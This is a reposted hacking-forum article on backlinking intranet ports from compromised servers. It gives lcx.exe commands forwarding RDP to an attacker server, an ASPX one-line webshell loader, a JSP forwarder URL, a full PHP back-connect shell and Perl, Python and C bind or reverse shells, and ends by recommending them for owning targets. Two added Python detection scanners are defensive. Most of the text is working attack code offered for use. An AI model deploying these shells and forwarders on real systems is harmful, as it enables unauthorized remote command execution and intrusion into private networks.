
[Repost] A Collection of Intranet Port Forwarding Methods

May 25, 2014, by baoz

Reposted from Silic (习科): http://silic.org/post/Port_Forwarding_from_Intranet_Multiple_Collection

This article was originally contributed by Silic forum member 小Dの马甲. It collects several methods of forwarding ports out of an intranet, and we hope it gives readers some inspiration.

I. Sample Backlinks with "lcx.exe"

First, download lcx.exe from:

  attach.blackbap.org/down/yclj/lcx.exe

The program only runs on Windows Server; it can backlink (forward) port 3389 to another server.

Use lcx.exe on your own server to open and listen on a port (e.g. 3333), and link port 3333 to local port 4444:

```
lcx.exe l 3333 4444
```

Then run lcx on the target server to backlink the remote desktop port 3389:

```
lcx.exe s yourserverip 3333 127.0.0.1 3389
```

The connection chain looks like this:

  target:3389 <<-->> remote lcx <<-->> yourserver:3333 <<-->> yourserver:4444

If it succeeds, connecting to 127.0.0.1:4444 is equivalent to connecting to target:3389.

II. Using an ASPX Script to Backlink a Remote Port

The tool can be downloaded here:

  attach.blackbap.org/down/wzaq/ASPX.rar

Before using it, the following must be in place: an ASPX webshell on the target, and ASP.NET must be running properly.

```aspx
<%@ Page Language="C#" ValidateRequest="false" %>
<% try{ System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["psw"].Value))).CreateInstance("c",true,System.Reflection.BindingFlags.Default,null,new object[]{this},null,null); }catch{} %>
```

and lcx on an internet-facing machine.

The last step is the configuration (the screenshot is not reproduced here):

The picture backlinked port 14147; any other port works the same way.

III. Using a JSP Script with Sockets

The JSP script can be downloaded here:

  http://attach.blackbap.org/down/wzaq/jspdkzf.rar

The server must support a Java environment. Usage is as follows:

```
target/jspdkzf.jsp?localIP=127.0.0.1&localPort=3389&remoteIP=yourserveripaddress&remotePort=3333
```

This script can also backlink 3306 (MySQL default port), 22 (SSH default port), and so on.

IV. Using a PHP Script with Sockets

The script supports both Windows and Linux servers; it loads the sockets extension with the dl() function. The code follows:

```php
<?php
function phpsocket(){
    @set_time_limit(0);
    $system=strtoupper(substr(PHP_OS,0,3));
    if(!extension_loaded('sockets')){if($system=='WIN'){@dl('php_sockets.dll') or die("Can't load socket");}else{@dl('sockets.so') or die("Can't load socket");}}
    if(isset($_POST['host'])&& isset($_POST['port'])){$host = $_POST['host'];$port = $_POST['port'];}
    else{
print<<<SILIC
<p>php_sockets setting openning<br></p>
<form method=post action="?">
Host:<input type=text name=host value=""><br>
Port:<input type=text name=port value="1120"><br><br>
<input type="radio" name=info value="linux" checked>Linux <input type="radio" name=info value="win">Windows <input class="bt" type=submit name=submit value="Backlink"><br>
</form>
SILIC;
    }
    if($system=="WIN"){$env=array('path'=>'c:\\windows\\system32');}
    else{$env = array('PATH'=>'/bin:/usr/bin:/usr/local/bin:/usr/local/sbin:/usr/sbin');}
    $descriptorspec = array(0=> array("pipe","r"),1=> array("pipe","w"),2=> array("pipe","w"),);
    $host=gethostbyname($host);
    $proto=getprotobyname("tcp");
    if(($sock=socket_create(AF_INET,SOCK_STREAM,$proto))<0){die("Socket Creat Failed");}
    if(($ret=socket_connect($sock,$host,$port))<0){die("Connect Failed");}
    else{
        $message="-------------PHP Backlink, Silic Security-------------\\n";
        socket_write($sock,$message,strlen($message));
        $cwd=str_replace('\\','/',dirname(__FILE__));
        while($cmd=socket_read($sock,65535,$proto)){
            if(trim(strtolower($cmd))=="exit"){socket_write($sock,"Bye\n");exit;}
            else{
                $process = proc_open($cmd, $descriptorspec, $pipes, $cwd, $env);
                if(is_resource($process)){
                    fwrite($pipes[0], $cmd);
                    fclose($pipes[0]);
                    $msg=stream_get_contents($pipes[1]);
                    socket_write($sock,$msg,strlen($msg));
                    fclose($pipes[1]);
                    $msg=stream_get_contents($pipes[2]);
                    socket_write($sock,$msg,strlen($msg));
                    $return_value = proc_close($process);
                }
            }
        }
    }
}
@phpsocket();
?>
```

The host in the form is your server's IP address; the port in the form is the port you are listening on on your server.

The shell in the code can be changed.
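As an added defensive example (not part of the original post or of any tool it links): a small static scanner that flags web files carrying the indicators shown in sections II, III and IV above, namely the Assembly.Load(Request.BinaryRead(...)) ASPX loader, the dl()/socket_connect/proc_open combination of the PHP back-connect script, and the localPort/remotePort parameters of the JSP forwarder. The pattern weights, the alert threshold and the sample file contents are assumptions constructed for this example.

```python
import re

# Indicator patterns for the loader / back-connect scripts shown above.
# Each entry: (label, regex, weight). Weights are an assumption for this example.
INDICATORS = [
    ("aspx_assembly_loader",
     re.compile(r"Assembly\.Load\s*\(\s*Request\.BinaryRead", re.I), 5),
    ("aspx_validate_request_off",
     re.compile(r'ValidateRequest\s*=\s*"false"', re.I), 1),
    ("php_socket_extension_load",
     re.compile(r"dl\s*\(\s*['\"](php_sockets\.dll|sockets\.so)['\"]", re.I), 3),
    ("php_outbound_socket",
     re.compile(r"socket_connect\s*\(", re.I), 2),
    ("php_command_execution",
     re.compile(r"\b(proc_open|popen|shell_exec|system|passthru)\s*\(", re.I), 2),
    ("jsp_port_forward_params",
     re.compile(r"localPort\s*=.*remotePort\s*=", re.I | re.S), 3),
]

ALERT_THRESHOLD = 4  # assumption: total score at which a file deserves review

def scan_source(name, text):
    """Return (name, score, [matched labels]) for the contents of one file."""
    hits = [(label, weight) for label, rx, weight in INDICATORS if rx.search(text)]
    return name, sum(w for _, w in hits), [label for label, _ in hits]

def scan_files(files):
    """files: dict path -> contents. Returns rows scoring >= ALERT_THRESHOLD, highest first."""
    results = [scan_source(path, text) for path, text in files.items()]
    return sorted((r for r in results if r[1] >= ALERT_THRESHOLD), key=lambda r: -r[1])

# Constructed sample inputs (not files taken from any real system).
SAMPLES = {
    "/var/www/upload/img.aspx": '<%@ Page Language="C#" ValidateRequest="false" %>\n'
        '<% System.Reflection.Assembly.Load(Request.BinaryRead(0)); %>',
    "/var/www/html/contact.php": "<?php mail($to, $subject, $body); ?>",
    "/var/www/html/s.php": "<?php @dl('php_sockets.dll'); socket_connect($s,$h,$p); "
        "proc_open($cmd,$d,$pipes); ?>",
}

if __name__ == "__main__":
    for path, score, labels in scan_files(SAMPLES):
        print("%2d  %s  %s" % (score, path, ",".join(labels)))
```

Point scan_files() at a directory walk of the web root and diff the results against a known-good baseline; the individual weights matter less than the combination of a loader or socket call with a command-execution primitive in one file.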

V. 80/443 Port Multiplexing and Privilege Escalation

Here is the tool; it supports ASPX/PHP/JSP scripts:

  attach.blackbap.org/down/yclj/reDuh.rar

URL is the reDuh server webshell; the remote host can use the default (127.0.0.1); the remote port is the port you want to backlink.

Any port that satisfies the rules can be used (the default is port 1234). Then create the link in the program and connect to the default port 1234 locally, using your local software, telnet, or any program that can make a connection.
(The picture used the wrong shell for the target.)

VI. Bind a Port on the Target Server

Perl script:

```perl
#!/usr/bin/perl
$os = $^O;
$SHELL="/bin/sh";
if($os =~ m/win/i){ $SHELL="%COMSPEC% /K";}
if(@ARGV<1){exit(1);}
$LISTEN_PORT=$ARGV[0];
use Socket;
$protocol=getprotobyname('tcp');
socket(S,&PF_INET,&SOCK_STREAM,$protocol)||die("error\n");
setsockopt(S,SOL_SOCKET,SO_REUSEADDR,1);
bind(S,sockaddr_in($LISTEN_PORT,INADDR_ANY))||die("error\n");
listen(S,3)||die "";
while(1)
{
    accept(CONN,S);
    if(!($pid=fork))
    {
        die "Cannot fork" if(!defined $pid);
        open STDIN,"<&CONN";
        open STDOUT,">&CONN";
        open STDERR,">&CONN";
        exec $SHELL ||die("error\n");
        close CONN;
        exit 0;
    }
}
```

Python script:

```python
#!/usr/bin/env python
# Python 2 code: recv()/send() operate on str.
import os, sys, socket, time
MAX_LEN = 1024
SHELL = "/bin/bash -c"
TIME_OUT = 300
PORT = ""
HOST = ""

def shell(cmd):
    sh_out = os.popen(SHELL + " " + cmd).readlines()
    nsh_out = ""
    for i in range(len(sh_out)):
        nsh_out += sh_out[i]
    return nsh_out

def action(conn):
    while True:
        try:
            pcmd = conn.recv(MAX_LEN)
        except:
            print("error\n")
            return True
        else:
            cmd = ""
            for i in range(len(pcmd) - 1):
                cmd += pcmd[i]
            if cmd == ":dc":
                return True
            elif cmd == ":sd":
                return False
            else:
                if len(cmd) > 0:
                    out = shell(cmd)
                    conn.send(out)

argv = sys.argv
if len(argv) == 2:
    PORT = argv[1]
elif len(argv) == 3:
    PORT = argv[1]
    HOST = argv[2]
else:
    exit(1)
PORT = int(PORT)
if os.fork() != 0:
    sys.exit(0)
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(TIME_OUT)
if len(argv) == 2:
    sock.bind(('localhost', PORT))
    sock.listen(0)
run = True
while run:
    if len(argv) == 3:
        try:
            sock.connect((HOST, PORT))
        except:
            print("error\n")
            time.sleep(5)
        else:
            run = action(sock)
    else:
        try:
            (conn, addr) = sock.accept()
        except:
            print("error\n")
            time.sleep(1)
        else:
            run = action(conn)
if len(argv) == 2:
    conn.shutdown(2)
else:
    try:
        sock.send("")
    except:
        time.sleep(1)
    else:
        sock.shutdown(2)
```

C script:

```c
#include <stdio.h>
#include <string.h>
#include <stdlib.h>      /* atoi */
#include <unistd.h>      /* fork, dup2, execl, close */
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <errno.h>
int main(argc, argv)
int argc;
char **argv;
{
    int sockfd, newfd;
    struct sockaddr_in remote;
    if(fork()==0){
        remote.sin_family = AF_INET;
        remote.sin_port = htons(atoi(argv[1]));
        remote.sin_addr.s_addr = htonl(INADDR_ANY);
        sockfd = socket(AF_INET,SOCK_STREAM,0);
        if(!sockfd) perror("error\n");
        bind(sockfd,(struct sockaddr *)&remote,0x10);
        listen(sockfd,5);
        while(1){
            newfd=accept(sockfd,0,0);
            dup2(newfd,0);
            dup2(newfd,1);
            dup2(newfd,2);
            execl("/bin/sh","sh",(char*)0);
            close(newfd);
        }
    }
}
int chpass(char *base, char *entered){
    int i;
    for(i=0;i<strlen(entered);i++)
    {
        if(entered[i]=='\n')
            entered[i]='\0';
        if(entered[i]=='\r')
            entered[i]='\0';
    }
    if(!strcmp(base,entered))
        return 0;
}
```

The usage is the same:

```
script target port
```

The C script is best (I think). Opening and binding a shell/command-line port from a webshell, then forwarding it and escalating privileges, is a good method for owning a target.
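As an added defensive example (not code from the original post): a host-side check over a socket table joined with process parentage that flags the three behaviours the tools in sections I, IV, V and VI leave behind: a web worker dialling out to an outside host on a non-web port (the PHP/JSP back-connect and the lcx slave side), an unapproved listener opened by a shell or interpreter or under a web worker (the lcx listener, reDuh, and the Perl/Python/C bind shells), and a shell whose parent is a web worker. Process names, port allowlists, internal address ranges and the sample rows are assumptions constructed for this example.

```python
from ipaddress import ip_address, ip_network
# Process names, port policy and internal ranges are assumptions for this
# example; adapt them to the host being checked.
WEB_WORKERS = {"w3wp.exe", "php-fpm", "php-cgi", "httpd", "apache2", "java"}
SHELLS = {"sh", "bash", "cmd.exe", "powershell.exe", "perl", "python", "lcx.exe"}
ALLOWED_LISTEN = {80, 443, 8080}   # ports this host is expected to serve
ALLOWED_EGRESS = {80, 443}         # ports a web worker may legitimately reach
INTERNAL_NETS = [ip_network(n) for n in ("127.0.0.0/8", "10.0.0.0/8",
                 "172.16.0.0/12", "192.168.0.0/16", "169.254.0.0/16")]

def is_external(ip):
    # True when the address lies outside the loopback/RFC1918 ranges above.
    addr = ip_address(ip)
    return not any(addr in net for net in INTERNAL_NETS)

def classify(rec):
    """One socket-table row joined with its owning process and that process's
    parent. Returns the alert strings the row triggers (empty if benign)."""
    alerts, proc, parent = [], rec["proc"], rec["parent"]
    # Back-connect: a web worker reaching an outside host on a non-web port
    # (the PHP/JSP scripts dial "yourserverip:3333" exactly like this).
    if (rec["state"] == "ESTAB" and proc in WEB_WORKERS
            and is_external(rec["raddr"]) and rec["rport"] not in ALLOWED_EGRESS):
        alerts.append("%s back-connect to %s:%d" % (proc, rec["raddr"], rec["rport"]))
    # Bind shell / lcx-style listener: a shell or interpreter listening on an
    # unapproved port, or any unapproved listener whose parent is a web worker.
    if (rec["state"] == "LISTEN" and rec["lport"] not in ALLOWED_LISTEN
            and (proc in SHELLS or parent in WEB_WORKERS)):
        alerts.append("unexpected listener %s on port %d" % (proc, rec["lport"]))
    # Command execution: a shell holding a socket with a web worker as parent
    # (proc_open/exec with the connection duplicated onto its stdio).
    if proc in SHELLS and parent in WEB_WORKERS:
        alerts.append("shell %s spawned by web worker %s" % (proc, parent))
    return alerts

def scan(records):
    """Return [(proc, alerts)] for the rows that triggered at least one alert."""
    return [(r["proc"], a) for r in records for a in [classify(r)] if a]

# Constructed sample rows (not captured from a real host).
SAMPLE = [
    dict(state="ESTAB", laddr="10.0.0.5", lport=51234, raddr="203.0.113.9", rport=3333, proc="php-fpm", parent="systemd"),
    dict(state="ESTAB", laddr="10.0.0.5", lport=51240, raddr="203.0.113.20", rport=443, proc="httpd", parent="systemd"),
    dict(state="LISTEN", laddr="0.0.0.0", lport=4444, raddr="", rport=0, proc="perl", parent="php-fpm"),
    dict(state="LISTEN", laddr="0.0.0.0", lport=22, raddr="", rport=0, proc="sshd", parent="systemd"),
    dict(state="ESTAB", laddr="10.0.0.5", lport=51250, raddr="10.0.0.7", rport=1433, proc="w3wp.exe", parent="services.exe"),
    dict(state="ESTAB", laddr="127.0.0.1", lport=5555, raddr="127.0.0.1", rport=1234, proc="sh", parent="w3wp.exe"),
]
```

Feed scan() the rows produced by joining `ss -tnp`/`netstat -ano` output with the process tree; the reDuh case is the last sample row, where the only network evidence is a loopback connection and the process parentage is what gives it away.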

Silic Security,to be continued….
//silic.Org
